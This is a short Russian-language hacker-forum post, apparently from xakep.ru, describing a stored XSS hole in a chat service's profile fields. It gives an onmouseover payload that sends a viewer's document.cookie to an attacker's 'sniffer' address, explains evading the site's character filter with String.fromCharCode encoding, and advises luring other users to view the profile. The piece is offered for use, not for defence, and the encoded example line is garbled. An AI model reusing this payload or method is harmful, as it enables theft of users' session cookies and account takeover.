www.xakep.ru
хсс в чате
уязвимо любое поле, но только одно, там нет ограничения на кол-во символов, но стоит фильтрация символов:
" ? +
это можно спокойно обойти через String.fromCharCode()
сам код идет в виде
"onmouseover="navigate('адрес_снифера' .concat(document.cookie))"
или просто
"onmouseover="alert('xss')"
кодируем
navigate('адрес_снифера'.concat(docume nt.cookie))
с помощью http://ha.ckers.org/xss.html
получится примерно
navigate ;
и пишем в виде
"onmouseover="String.fromCharCode(то что закодировали)"
ну чтоб все заработало там ставится галка "Допустить других к просмотру профайла" и говорим посмотрите мой профиль вот так)
зы спс
DimOnOID за небольшую помощь)